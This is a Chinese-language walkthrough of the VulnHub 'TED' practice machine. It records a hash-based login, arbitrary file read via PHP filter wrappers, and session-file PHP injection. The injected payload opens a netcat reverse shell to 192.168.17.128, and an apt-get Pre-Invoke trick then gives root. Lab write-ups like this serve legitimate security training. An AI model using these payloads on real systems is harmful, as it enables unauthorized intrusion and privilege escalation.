vulnhub-TED靶场过程记录
靶场地址:https://download.vulnhub.com/ted/Ted.7z
靶场设置 使用VM打开
扫描靶场网段,得到ip地址
访问网址是个登陆框
扫描目录无果后,开始对登录框进行探索。
随便输入个密码后,发现密码或者密码hash错误,尝试多样的密码对比图如下
看来密码是admin没错了,然后应该是hash加密后访问。
这里耗尽了大量的时间,得出来了结果(还是朋友做出来的,难受)
这里使用的是sha256加密,然后加密的字符串,字符转换大写
在在线网站进行大小写转换
一发入魂
获得下一步提示
在search存在任意文件读取
阅览cookie.php发现回显了文件
这里有一个authenticate.php
正常读取会出现退出登陆的情况,使用php伪协议读取到了文件
源码如下
同样的方式读取home
Home文件中有这么一句话
$_SESSION['user_pref'] = $_COOKIE['user_pref'];
任意文件读取到sessions目录
第一种
写入一句话木马
链接蚁剑
但是上传不了脚本
一时间不知道咋弄了
第二种
%3C?php%20exec('nc%20192.168.17.128
%202222%20-e%20/bin/bash')%20?%3E
反弹nc
回到sessions哪里,因为有nc
对shell进行升级
SHELL=/bin/bash script -q /dev/null
然后卡壳,最终解决如下
记录如下
输入
sudo apt-get update -o APT::Update::Pre-Invoke::="/bin/bash -i"
提权